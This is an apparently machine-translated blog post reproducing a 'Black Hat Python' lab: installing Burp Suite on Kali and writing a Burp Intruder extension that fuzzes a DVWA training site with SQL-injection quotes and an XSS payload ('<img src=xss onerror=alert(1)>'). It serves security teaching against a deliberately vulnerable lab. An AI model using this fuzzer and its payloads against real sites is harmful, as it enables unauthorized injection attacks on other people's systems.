Recently, I received a network security book "Python Black Hat" presented by the Electronic Industry Press, with a total of 24 experiments in the book, and today reproduces the 15th experiment (BurpSuite Core Generator Plugin), my test environment is MBP computer + Kali virtual machine + DVWA online range. At present, only python2.7 is supported, and the soft link is adjusted slightly, and then I uninstalled the JDK and Burpsuite on Kali, and finally used JDK 1.8 and Burpsuite 1.7.36, and successfully reproduced this experiment, by the way, after doing many experiments, I am familiar with it~
AILX10
Excellent answerer in cybersecurity
Master's in Cybersecurity
Go to consult
Step 1: Prepare the environment
times 安装jdk1.8
apt-get update
apt-get install software-properties-common
apt-add-repository 'deb http://security.debian.org/debian-security stretch/updates main'
apt-get update
apt-get install openjdk-8-jdk Select JDK1.8
update-alternatives --config java Update soft connection for python2
ln -s /usr/bin/python2 /usr/bin/python Install an earlier version of Burpsuite 1.7.36
wget https://portswigger.net/burp/releases/download?product=community&version=1.7.36&type=linux
sudo chmod +x burpsuite_community_linux_v1_7_36.sh
sudo ./burpsuite_community_linux_v1_7_36.sh The import is successful, here you need to pay attention to the path does not have Chinese
Step 2: Prepare the experimental site
Choosing a DVWA Online Range[1]
Step 3: Actual combat drill
1. Enter the xss injection module and submit a string
2. Then in the proxy module of burp, send the carrier core to the intruder module
3、在intruder模块中payload页面下,选择payload type为Extension-generated,然后在payload options里面选择BHP Payload Generator 就大功告成了~
4. Click Start Attack, the pop-up window is actually tested here, but the display is not friendly
Reference Code:
# -*- coding: utf-8 -*-
# @Time : 2022/6/14 7:15 PM
# @Author : ailx10
# @File : bhf_fuzzer.py
from burp import IBurpExtender
from burp import IIntruderPayloadGeneratorFactory
from burp import IIntruderPayloadGenerator
from java.util import List,ArrayList
import random
class BurpExtender(IBurpExtender,IIntruderPayloadGeneratorFactory):
def registerExtenderCallbacks(self,callbacks):
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
callbacks.registerIntruderPayloadGeneratorFactory(self)
return
def getGeneratorName(self):
return "BHP Payload Generator"
def createNewInstance(self,attack):
return BHPFuzzer(self,attack)
class BHPFuzzer(IIntruderPayloadGenerator):
def __init__(self,extender,attack):
self._extender = extender
self._helpers = extender._helpers
self._attack = attack
self.max_payloads = 10
self.num_iterations = 0
return
def hasMorePayloads(self):
if self.num_iterations == self.max_payloads:
return False
else:
return True
def getNextPayload(self,current_payload):
payload = "".join(chr(x) for x in current_payload)
payload = self.mutate_payload(payload)
self.num_iterations += 1
return payload
def reset(self):
self.num_iterations = 0
return
def mutate_payload(self,original_payload):
picker = random.randint(1,3)
offset = random.randint(0,len(original_payload)-1)
front,back = original_payload[:offset],original_payload[offset:]
# SQL
if picker == 1:
front += "'"
# XSS
elif picker == 2:
front += "<img src=xss onerror=alert(1)>"
# Randomly extract a piece of data from the original carrier core, repeat it any number of times,
# and append it to the end of the front block
elif picker == 3:
chunk_length = random.randint(0,len(back)-1)
repeater = random.randint(1,10)
for _ in range(repeater):
front += original_payload[:offset + chunk_length]
return front + back reference
- ^DVWA Online Range https://www.vulnspy.com/dvwa/
Published on 2022-06-14 21:15